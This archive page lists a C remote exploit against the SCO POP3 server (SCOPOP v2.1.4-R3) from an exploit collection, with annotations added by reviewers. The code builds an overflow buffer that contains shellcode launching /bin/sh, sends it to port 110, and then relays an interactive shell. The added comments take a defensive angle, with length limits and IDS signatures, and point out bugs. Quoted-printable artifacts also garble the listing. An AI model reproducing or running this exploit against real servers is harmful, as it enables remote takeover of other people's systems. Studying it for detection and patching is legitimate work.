/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / mail / openserver / scopop.c < prev   
C/C++ Source or Header  |  2005-02-12  |  3KB  |  94 lines

  1. /*
  2.  *        Remote pop exploit for SCO systems.
  3.  *        by glitch of litecrew.
  4.  *        Ripped  from Miroslaw Grzybek's code.
  5.  */
  6.  
  7. #include        <stdio.h>
  8. #include        <stdlib.h>
  9. #include        <sys/time.h>
  10. #include        <sys/types.h>
  11. #include        <unistd.h>
  12. #include        <sys/socket.h>
  13. #include        <netinet/in.h>=20
  14. #include        <netdb.h>
  15. #include        <sys/errno.h>
  16.  
  /*
   * Listing note: the `=3D`, `=20` and line-final `=` sequences on this page
   * are quoted-printable transfer artifacts, and the leading "NN." on each line
   * is the archive page's gutter, so the text is not valid C as displayed.
   *
   * shell: opaque machine-code byte string that main() copies into the
   * outgoing buffer at byte 800. It is not analysed here. For detection the
   * useful observable is the literal "/bin/sh" sitting among non-printable
   * bytes, which does not belong in a POP3 command line.
   */
  17. char *shell=3D
  18. "\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
  19. "\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
  20. "\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
  21. "\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff"
  22. "\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
  23. "\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
  24.  
  /*
   * ADDR:   base value that main() stores, plus `offset`, repeatedly through
   *         the tail of buf. NOTE(review): presumably a memory address specific
   *         to the server build named in the usage text; not verifiable here.
   * OFFSET: default for the optional second command-line argument.
   * BUFLEN: size of buf, and so the approximate size of the line that is sent.
   */
  25. #define ADDR 0x80474b4
  26. #define OFFSET 0
  27. #define BUFLEN 1200
  28.  
  /* File-scope state shared by main(); buf holds the outgoing data first and
   * is then reused as the relay buffer for both directions. */
  29. char    buf[BUFLEN];
  /* Adjustment added to ADDR; overwritten from argv[2] when it is given. */
  30. int     offset=3DOFFSET;
  /* Byte count returned by the most recent read() on the socket. */
  31. int     nbytes;
  /* TCP socket connected to the server. */
  32. int     sock;
  /* Destination address (AF_INET, port 110) and the resolver result behind it. */
  33. struct  sockaddr_in sa;
  34. struct  hostent *hp;
  /* Scratch value used by the printable-character filter in the relay loop. */
  35. short a;
  /*
   * main: exploit client for a POP3 server; the usage text names
   * SCOPOP v2.1.4-R3 as the build it was written against.
   *
   * What it puts on the wire, as far as this file shows: one TCP connection to
   * port 110, then a single write of roughly BUFLEN bytes made of 0x90 filler,
   * the `shell` byte string and a repeated 4-byte value. The write happens
   * without reading the server greeting and without any POP3 verb. After that
   * the process relays bytes between its own stdin/stdout and the socket.
   *
   * Defensive reading: a first client line of this size is already out of
   * protocol (RFC 2449 caps POP3 command lines at 255 octets). A length limit
   * in the server or in a proxy in front of it, or an IDS rule on over-long or
   * non-printable client lines on port 110, covers this class of input. The
   * server routine that mishandles the line is not shown on this page.
   *
   * argv[1]: host name or address. argv[2]: optional integer added to ADDR.
   * Every exit path before the relay loop calls exit(0), including failures,
   * so the exit status does not distinguish a usage error from a network error.
   */
  36. void main (int argc, char *argv[]) {
  37.         int i;
  38.         if(argc<2) {
  39.                 printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
  40.                 printf("Default offset is 0. It works against SCOPOP =
  41. v2.1.4-R3\n");
  42.                 exit(0);
  43.         }
  /* atoi() reports no errors, so non-numeric text for argv[2] is taken as 0. */
  44.         if(argc>2)
  45.                 offset=3Datoi(argv[2]);
  /* Buffer layout: 0x90 across all of buf, `shell` copied in at byte 800,
   * then ADDR+offset stored every 4 bytes from index 901 while i < BUFLEN-4. */
  46.         memset(buf,0x90,BUFLEN);
  47.         memcpy(buf+800,shell,strlen(shell));
  48.         for(i=3D901;i<BUFLEN-4;i+=3D4)
  49.                 *(int *)&buf[i]=3DADDR+offset;
  /* NOTE(review): index BUFLEN is one past the end of buf, and this code
   * writes no terminator inside buf, so the strlen(buf) used for the send
   * below depends on memory outside the array. The length on the wire is
   * therefore not fixed by this source; detection should key on "far too
   * long for POP3" and not on an exact size. */
  50.         buf[BUFLEN]=3D'\n';
  /* Resolve the target given in argv[1]. */
  51.         if((hp=3D(struct hostent *)gethostbyname(argv[1]))=3D=3DNULL) {
  52.                 perror("gethostbyname()");
  53.                 exit(0);
  54.         }
  55.         if((sock=3Dsocket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
  56.                 perror("socket()");
  57.                 exit(0);
  58.         }
  /* Port 110 is hard-coded; the address comes from the resolver result. */
  59.         sa.sin_family=3DAF_INET;
  60.         sa.sin_port=3Dhtons(110);
  61.         memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
  62.         if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=3D0) {
  63.                 perror("connect()");
  64.                 exit(0);
  65.         }
  66.         printf("CONNECTED TO %s... SENDING DATA\n",argv[1]); =
  67. fflush(stdout);
  /* The buffer is the first thing the client sends; the result of write() is
   * not checked. */
  68.         write(sock,buf,strlen(buf));
  /* Relay loop: wait on stdin (fd 0) and the socket, copy socket data to
   * stdout and stdin data to the socket. NOTE(review): presumably a session
   * that reaches this stage shows up as a long-lived port-110 connection
   * carrying traffic that is not POP3 dialogue - confirm against captures. */
  69.         while(1) {
  70.                 fd_set input;
  71.  
  72.                 FD_SET(0,&input);
  73.                 FD_SET(sock,&input);
  74.                 if((select(sock+1,&input,NULL,NULL,NULL))<0) {
  75.                         if(errno=3D=3DEINTR) continue;
  76.                         printf("CONNECTION CLOSED...\n"); =
  77. fflush(stdout);
  78.                         exit(1);
  79.                 }
  80.                 if(FD_ISSET(sock,&input)) {
  81.                         nbytes=3Dread(sock,buf,BUFLEN);
  /* Terminal hygiene: every byte other than newline (10) that falls outside
   * 32..126 is replaced with a space before the data is echoed.
   * NOTE(review): only one byte of the short `a` is assigned, so the
   * comparison relies on the remaining byte being zero - confirm for the
   * target byte order. */
  82.                         for(i=3D0;i<nbytes;i++) {
  83.                              *(char *)&a=3Dbuf[i];
  84.                              if ((a!=3D10)&&((a >126) || (a<32)) ){
  85.                              buf[i]=3D' ';
  86.                            }
  87.                          }
  88.                         write(1,buf,nbytes);
  89.                 }
  /* stdin is forwarded to the socket; the return value of read() is passed
   * straight to write() as the length, with no error or end-of-file check. */
  90.                 if(FD_ISSET(0,&input))
  91.                         write(sock,buf,read(0,buf,BUFLEN));
  92.         }
  93. }
  94.